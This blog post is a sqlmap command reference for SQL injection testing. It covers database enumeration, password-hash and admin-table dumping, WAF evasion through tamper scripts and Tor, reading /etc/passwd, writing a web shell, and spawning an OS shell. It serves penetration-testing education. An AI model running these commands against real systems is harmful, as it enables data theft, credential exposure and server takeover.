top of page

Mastering sqlmap: A Comprehensive Guide for Advanced SQL Injection Techniques

 The Ultimate sqlmap Command Reference: Advanced Techniques for Penetration Testing


**Disclaimer:** This article is intended for educational purposes and authorized security testing only. Unauthorized use of sqlmap against systems without explicit written consent is illegal. The author assumes no responsibility for any misuse or damage caused by the tools and techniques described herein. Always ensure you have proper permissions before performing any security assessment.


---


## Introduction


[sqlmap](https://sqlmap.org/) is the de‑facto standard for automated SQL injection detection and exploitation. Whether you are a penetration tester, a bug bounty hunter, or a security enthusiast, mastering sqlmap can dramatically accelerate your workflow. Yet, many users only scratch the surface – they use `--dbs`, `--tables`, and `--dump`, but rarely venture into the vast array of advanced options that can bypass WAFs, handle complex authentication, and even pop an OS shell.


This blog post is a comprehensive reference guide that covers everything from basic enumeration to advanced tamper scripts, performance tuning, and file system access. I have compiled this command sheet after years of real‑world testing, and I hope it becomes your go‑to resource whenever you need to squeeze every drop of power from sqlmap.


Let’s dive in.


---


## 1. Basic Syntax and Target Specification


At its core, sqlmap requires a target URL or a request file. The simplest command is:


```bash

sqlmap -u "http://example.com/page.php?id=1"

```


But you can also feed it raw HTTP requests (e.g., from Burp Suite) to handle complex sessions:


```bash

sqlmap -r request.txt

```


For POST requests, use the `--data` flag:


```bash

sqlmap -u "http://example.com/login" --data="user=admin&pass=123"

```


If you have multiple targets, use the `-m` option with a file containing one URL per line. You can even leverage Google dorks to discover potential targets:


```bash

sqlmap -g "inurl:product.php?id="

```


**Pro tip:** Always use the `--batch` flag to avoid interactive prompts when you want automated scanning.


---


## 2. Request Manipulation – Headers, Cookies, and Proxies


Real‑world applications often require authentication, custom headers, or request throttling. sqlmap offers fine‑grained control over these aspects.


| Need | Command |

|------|---------|

| Set a cookie | `--cookie="PHPSESSID=abc123"` |

| Randomize User‑Agent | `--random-agent` |

| Add custom headers | `--headers="X-Forwarded-For: 127.0.0.1"` |

| Use HTTP Basic Auth | `--auth-type=Basic --auth-cred="user:pass"` |

| Route through a proxy | `--proxy="http://127.0.0.1:8080"` |

| Use Tor | `--tor --tor-type=SOCKS5` |

| Add delay between requests | `--delay=2` |

| Increase connection timeout | `--timeout=10` |


When you are facing rate‑limiting or a fragile application, a combination of `--delay`, `--retries`, and `--timeout` can prevent failures and detection.


---


## 3. Enumeration – Extracting Data Efficiently


Once sqlmap confirms an injection point, you can start enumerating the database. Below are the essential commands for gathering information.


### Database, Users, and Privileges


```bash

# Current database name

sqlmap -u URL --current-db


# List all databases

sqlmap -u URL --dbs


# Current database user

sqlmap -u URL --current-user


# Check if you have DBA (admin) privileges

sqlmap -u URL --is-dba


# List all database users and their password hashes

sqlmap -u URL --users --passwords

```


### Tables, Columns, and Data


```bash

# List tables in a specific database

sqlmap -u URL -D target_db --tables


# List columns in a specific table

sqlmap -u URL -D target_db -T users --columns


# Dump the entire table

sqlmap -u URL -D target_db -T users --dump


# Dump only a limited number of rows

sqlmap -u URL -D target_db -T users --dump --start=1 --stop=50


# Dump specific columns only

sqlmap -u URL -D target_db -T users --dump -C "username,password,email"

```


You can also use `--search` to find tables or columns containing specific names, and `--sql-query` to run arbitrary SQL statements – perfect for data mining.


---


## 4. Injection Techniques and Detection


By default, sqlmap tests all techniques (Boolean‑based blind, error‑based, union query, stacked queries, and time‑based blind). However, you can force a specific technique to speed up testing or when you know which one works best.


| Technique | Flag |

|-----------|------|

| Boolean‑based blind | `B` |

| Error‑based | `E` |

| Union query | `U` |

| Stacked queries | `S` |

| Time‑based blind | `T` |


Example – use only time‑based blind with a higher sleep time:


```bash

sqlmap -u URL --technique=T --time-sec=10

```


### Level and Risk


- **`--level`** (1–5): Increases the depth of testing. Higher levels test more parameters (e.g., HTTP headers, cookies) and deeper injection points.

- **`--risk`** (1–3): Increases the aggressiveness. Risk 3 may use `OR` injections that can potentially alter data, so use with caution.


For a thorough test, use:


```bash

sqlmap -u URL --level=5 --risk=3

```


### Handling Special Injection Points


If the vulnerable parameter is not named `id`, you can force sqlmap to test a specific parameter with `-p`. If you have a complex injection context (e.g., inside a JSON payload), you may need to supply a `--prefix` and `--suffix` to complete the query correctly.


---


## 5. Performance Tuning


Large‑scale scanning can be slow. Use these optimizations:


- **`--threads`** – Increase the number of concurrent HTTP requests (max 10).

- **`--predict-output`** – Use common value prediction to speed up enumeration.

- **`--keep-alive`** – Reuse HTTP connections.

- **`--null-connection`** – Retrieve only page length, not the full body (faster).

- **`--hex`** – Use hex representation to avoid encoding issues and sometimes speed up data retrieval.


Example of a fast, aggressive scan:


```bash

sqlmap -u URL --threads=10 --level=3 --risk=2 --hex --batch

```


---


## 6. Advanced WAF Bypass with Tamper Scripts


One of sqlmap's most powerful features is its tamper scripts. These modify the payloads to evade WAFs, IPS, and input filters. You can chain multiple tamper scripts together by separating them with commas.


### Commonly Used Tamper Scripts


| Script | Description |

|--------|-------------|

| `space2comment` | Replace spaces with `/**/` |

| `between` | Use `BETWEEN` instead of `=` |

| `randomcase` | Randomise keyword case |

| `charencode` | URL‑encode all characters |

| `versionedmorekeywords` | Use MySQL versioned keywords |

| `ifnull2ifisnull` | Rewrite `IFNULL` to `IF(ISNULL())` |

| `plus2concat` | Convert `+` to `CONCAT()` |

| `nonrecursivereplacement` | Replace SQL keywords with alternatives |


**Example WAF bypass command:**


```bash

sqlmap -u URL --tamper=space2comment,between,randomcase --random-agent --delay=1

```


If you face a stubborn WAF, experiment with different combinations and consider using `--skip-waf` to bypass the heuristic detection phase.


---


## 7. File System Access and OS Shell


When you have **FILE** privileges on the database, you can read and write files on the server. This is a game‑changer for post‑exploitation.


### Read a file


```bash

sqlmap -u URL --file-read="/etc/passwd"

```


### Write a file (e.g., a web shell)


```bash

sqlmap -u URL --file-write="/tmp/shell.php" --file-dest="/var/www/html/shell.php"

```


### OS Command Execution


If the DBMS supports stacked queries and you have sufficient privileges, you can spawn an interactive OS shell:


```bash

sqlmap -u URL --os-shell

```


This is often the ultimate goal of a SQL injection attack, but remember – it is also the most damaging and should only be performed with explicit authorization.


---


## 8. Advanced Usage Examples


To tie everything together, here are some real‑world scenarios with full command lines.


### Scenario 1: Full Database Enumeration Behind a WAF


```bash

sqlmap -u "https://target.com/news?id=1" \

--random-agent \

--tamper=space2comment,between \

--delay=2 \

--threads=3 \

--level=3 \

--risk=2 \

--batch \

--dbs

```


### Scenario 2: Dump Admin Users from a Specific Table


```bash

sqlmap -u "https://target.com/view.php?id=5" \

-D corporate_db \

-T administrators \

--dump \

--where="role='superadmin'" \

-C "id,username,password_hash,email" \

--hex --no-cast

```


### Scenario 3: Using a Burp Request with Authentication


```bash

sqlmap -r burp_request.txt \

--cookie="PHPSESSID=xyz" \

--headers="X-Custom: value" \

--level=2 \

--technique=BEU \

--batch

```


### Scenario 4: Time‑Based Blind Only for a Slow Connection


```bash

sqlmap -u "https://target.com/search?q=test" \

--technique=T \

--time-sec=15 \

--delay=5 \

--retries=2

```


### Scenario 5: OS Shell via SQL Injection


```bash

sqlmap -u "https://target.com/page?id=1" --os-shell --batch

```


---


## 9. Troubleshooting Common Issues


Even with the best preparation, you may encounter errors. Here’s a quick checklist:


| Symptom | Solution |

|---------|----------|

| **403 Forbidden** | Use `--random-agent`, `--tamper=space2comment`, `--delay`, and rotate proxies with `--proxy`. |

| **WAF blocks every request** | Try multiple tamper scripts, increase `--delay`, use `--timeout` to slow down, and consider `--tor`. |

| **Enumeration is extremely slow** | Increase `--threads`, use `--hex`, and restrict techniques to the fastest working one. |

| **Garbled or empty output** | Use `--hex` and `--no-cast`; also specify the correct `--dbms`. |

| **Session corruption** | Reset with `--flush-session` to start fresh. |

| **No injection found** | Increase `--level` and `--risk`, or manually provide `--prefix` and `--suffix` based on your observations. |


---


## 10. Final Thoughts


sqlmap is an incredibly versatile tool that can save hours of manual exploitation. However, its true power lies in knowing which options to combine for each specific target. The command sheet provided in this article covers the vast majority of use cases you will encounter in the field.


Remember to always:

- Obtain written permission before testing.

- Use `--batch` for automation, but understand the implications.

- Keep your sqlmap version updated – new tamper scripts and features are added regularly.


I hope this reference serves you well on your security assessments. Happy (and ethical) hacking!


---


**Further Reading:**

- [Official sqlmap Documentation](https://github.com/sqlmapproject/sqlmap/wiki)

- [sqlmap Tamper Scripts List](https://github.com/sqlmapproject/sqlmap/tree/master/tamper)


*If you found this guide helpful, share it with your fellow pentesters and leave a comment below with your own favorite sqlmap tricks!*

 
 
 

Comments


©2025-26 BY VIPHACKER.100 | ARYAN AHIRWAR

  • Linkedin
  • Facebook
  • Youtube
  • alt.text.label.Instagram
bottom of page